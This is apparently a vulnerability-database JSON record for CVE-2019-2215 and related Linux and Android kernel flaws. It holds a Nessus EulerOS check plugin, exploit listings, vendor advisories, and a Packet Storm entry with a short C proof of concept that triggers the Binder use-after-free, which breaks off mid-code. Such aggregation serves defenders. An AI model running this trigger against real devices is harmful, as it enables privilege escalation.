aka\n CID-b70261a288ea.(CVE-2020-12653)An issue was found in\n Linux kernel before 5.5.4. mwifiex_ret_wmm_get_status()\n in drivers/ net/wireless/marvell/mwifiex/wmm.c allows a\n remote AP to trigger a heap-based buffer overflow\n because of an incorrect memcpy, aka\n CID-3a9b153c5591.(CVE-2020-12654)An issue was\n discovered in xfs_agf_verify in\n fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through\n 5.6.10. Attackers may trigger a sync of excessive\n duration via an XFS v5 image with crafted metadata, aka\n CID-d0c7feaf8767.(CVE-2020-12655)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1674\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35c58a13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14901\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.62.59.83.h230\",\n \"kernel-debug-3.10.0-327.62.59.83.h230\",\n \"kernel-debug-devel-3.10.0-327.62.59.83.h230\",\n \"kernel-debuginfo-3.10.0-327.62.59.83.h230\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.62.59.83.h230\",\n \"kernel-devel-3.10.0-327.62.59.83.h230\",\n \"kernel-headers-3.10.0-327.62.59.83.h230\",\n \"kernel-tools-3.10.0-327.62.59.83.h230\",\n \"kernel-tools-libs-3.10.0-327.62.59.83.h230\",\n \"perf-3.10.0-327.62.59.83.h230\",\n \"python-perf-3.10.0-327.62.59.83.h230\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-08-09T17:30:34", "description": "# CVE-2021-28663\nA basic PoC leak for CVE-2021-28663 (Internal o...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T22:59:29", "type": "githubexploit", "title": "Exploit for Use After Free in Arm Bifrost Gpu Kernel Driver", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28663"], "modified": "2022-08-09T09:57:23", "id": "35A68674-C566-5E2C-945A-C1DC41874B50", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-09T08:52:20", "description": "# CVE-2019-2215\n\n[Pr...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-17T11:53:54", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-01-09T07:14:56", "id": "4F143355-FABD-5536-9EC1-57EFFE95C643", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T01:50:17", "description": "# CVE-2019-2215\n\n## DISCLAIMER: THE CODE PROVIDED HERE IS FOR ED...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-05T06:23:28", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-08-08T17:22:50", "id": "1389F843-6C58-5A37-9A59-F04A86E79830", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-07T03:12:24", "description": "## CVE-2019-2215\n\nCopy and pasted from:\n\nhttps:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-04T06:32:08", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-07-07T02:11:02", "id": "EDEECD8E-68A4-5EE4-AC77-C29821562CB4", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:43:21", "description": "# CVE-2019-2215\nCVE-2019-2215 POC for kernel 3.18\n\nBased on Madd...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-07T16:48:40", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2021-06-30T15:55:48", "id": "2F22A06D-FEEB-5FB6-B41B-CA9039EA5BA0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-07T14:00:03", "description": "# CVE-2019-2215\nPoC for old Binder vulnerability (based on P0 ex...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-27T14:43:17", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-06-07T12:32:29", "id": "71A053F3-CAE4-55AC-9FC2-394F41225593", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-25T00:17:20", "description": "# CVE-2019-2215\n\nSource:\n\nhttps://bugs.chromium.org/p/project-ze...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-16T11:27:44", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-02-24T11:43:04", "id": "45006C08-C4BB-5BEA-8F4D-EFCCD7EBD323", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-16T02:10:43", "description": "# CVE-2019-2215\nTemproot for Bravia TV via CVE-2019-2215.\n\n## Ov...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-30T06:06:32", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-08-15T20:34:00", "id": "5C3FD7E3-2195-5B66-A20A-8AA8E5EC3898", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-31T02:29:31", "description": "# CVE-2019-2215\nThe following issue exists in the android-msm-wa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-12T03:22:27", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2021-12-31T02:16:10", "id": "1E11762E-7475-5A41-813C-F4C2B8595BB2", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-23T12:55:18", "description": "# Android Kernel Vulnerability\n\n\n\n\n\n# Overview\n\nIn November 2017...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-07T15:03:07", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-07-23T08:32:53", "id": "CF92EDDD-9AFA-57FB-A19D-3602342AEB5C", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-15T17:38:24", "description": "# CVE-2019-2215\n### Temproot for Pixel 2 and Pixel 2 XL via CVE-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-14T17:27:37", "type": "githubexploit", "title": "Exploit for Use After Free in Google Android", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-07-15T17:14:44", "id": "8DF22333-4C9A-57D1-BE23-9B67FFD6ECA1", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "huawei": [{"lastseen": "2023-06-13T20:06:11", "description": "There is a use-after-free vulnerability in binder.c of Android kernel. Successful exploitation may cause the attacker elevate the privilege. (Vulnerability ID: HWPSIRT-2019-10100) \n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2019-2215. \n\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\n\n[http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20191030-01-binder-en](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20191030-01-binder-en>)\n\n \n\n\n[](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20191023-01-smartphone-en>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-30T00:00:00", "type": "huawei", "title": "Security Advisory - Use-after-free Vulnerability in Android Kernel", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2020-08-05T00:00:00", "id": "HUAWEI-SA-20191030-01-BINDER", "href": "https://www.huawei.com/en/psirt/security-advisories/2019/huawei-sa-20191030-01-binder-en", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2021-06-08T18:58:10", "description": "### Description\n\nGoogle Android is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain elevated privileges.\n\n### Technologies Affected\n\n * Google Android 10.0 \n * Google Android 9.0 \n * Google Pixel 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nGiven the nature of this issue, allow only trusted and accountable users to have local, interactive access to vulnerable devices.\n\nCurrently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.\n", "cvss3": {}, "published": "2019-10-02T00:00:00", "type": "symantec", "title": "Google Android Binder CVE-2019-2215 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-02T00:00:00", "id": "SMNTC-110334", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110334", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2019-10-19T22:44:22", "description": "", "cvss3": {}, "published": "2019-10-18T00:00:00", "type": "packetstorm", "title": "Android Binder Use-After-Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-18T00:00:00", "id": "PACKETSTORM:154911", "href": "https://packetstormsecurity.com/files/154911/Android-Binder-Use-After-Free.html", "sourceData": "`# CVE-2019-2215 \n \nSource: \n \nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1942 \n \nhttps://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414885 \n \n \nSamsung S7 and S7 Edge with Kernel 3.18.x seem not vulnerable (could be however, with more work with PoC adjustments). Could not see more, since don't have rooted devices. \n \nSamsung S3Neo+ with LineageOS Kernel 3.4.0 possibly vulnerable (still in progress) \n \n``` \n \nKernel 3.4.0 \n \nhttps://github.com/S3NEO/android_kernel_samsung_s3ve3g/ \n \nNo KASLR \n \nNo need to leak Kernel Struct Addresses. \n \nbinder_thread size:0xfc (252) \n \nwait queue offset:0x2c (44) \n \n \nHad to add at least 2 entries for it to trigger, with 1, it didn't trigger \n \nhttps://github.com/S3NEO/android_kernel_samsung_s3ve3g/blob/348ef929213854f5c7ce6b608e2ca0216d6bdce7/fs/eventpoll.c#L533 \n \nPoC: \n \n \n#include <fcntl.h> \n#include <sys/epoll.h> \n#include <sys/ioctl.h> \n#include <unistd.h> \n#include <stdio.h> \n \n \n#define BINDER_THREAD_EXIT 0x40046208ul \n#define BINDER_VERSION 0xc0046209ul \n \nint main() \n{ \nint fd,fd1,fd2, epfd,epfd1; \nstruct epoll_event event = { .events = EPOLLOUT }; \n \nfd = open(\"/dev/binder\", O_RDONLY); \nfd1 = open(\"/dev/random\", O_RDONLY); \nepfd = epoll_create(1000); \nepfd1 = epoll_create(1000); \n \n \nif (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event)) err(1, \"epoll_add\"); \nif (epoll_ctl(epfd1, EPOLL_CTL_ADD, fd1, &event)) err(1, \"epoll_add\"); \n \n \n \n \n//ioctl(fd, BINDER_VERSION, NULL); \n \nioctl(fd, BINDER_THREAD_EXIT, NULL); \nprintf(\"Finished here.\"); \n} \n \n \nModified binder.c and evenpoll.c in the Kernel to see what is happening \n \nbinder.c \n \nstatic int binder_free_thread(struct binder_proc *proc, \nstruct binder_thread *thread) \n{ \nstruct binder_transaction *t; \nstruct binder_transaction *send_reply = NULL; \nint active_transactions = 0; \nstatic const size_t memberOffset = offsetof(binder_thread, wait); \nwait_queue_head_t *wqhptr = &thread->wait; \nwait_queue_head_t *pwqhptr = &proc->wait; \nstruct list_head *n1,*p1; \n \nwait_queue_t *my2; \n \n \nprintk(KERN_INFO \"iovec str size:%d\",sizeof(iovec)); \nprintk(KERN_INFO \"thread->task_list:%p\",(void *)&wqhptr->task_list); \nprintk(KERN_INFO \"proc->task_list:%p\",(void *)&pwqhptr->task_list); \nlist_for_each_safe(p1,n1, &pwqhptr->task_list){ \nmy2 = list_entry(p1, wait_queue_t, task_list); \nprintk (KERN_INFO \"p list= %p %p\" ,(void*)my2->task_list.prev,(void*)my2->task_list.next); \n} \nlist_for_each_safe(p1,n1, &wqhptr->task_list){ \nmy2 = list_entry(p1, wait_queue_t, task_list); \nprintk (KERN_INFO \"t list= %p %p\" ,(void*)my2->task_list.prev,(void*)my2->task_list.next); \n} \n \neventpoll.c \n \nstatic void ep_remove_wait_queue(struct eppoll_entry *pwq) \n{ \nwait_queue_head_t *whead; \nwait_queue_t *strptr; \nstruct list_head *n1,*p1; \n \nwait_queue_t *my2; 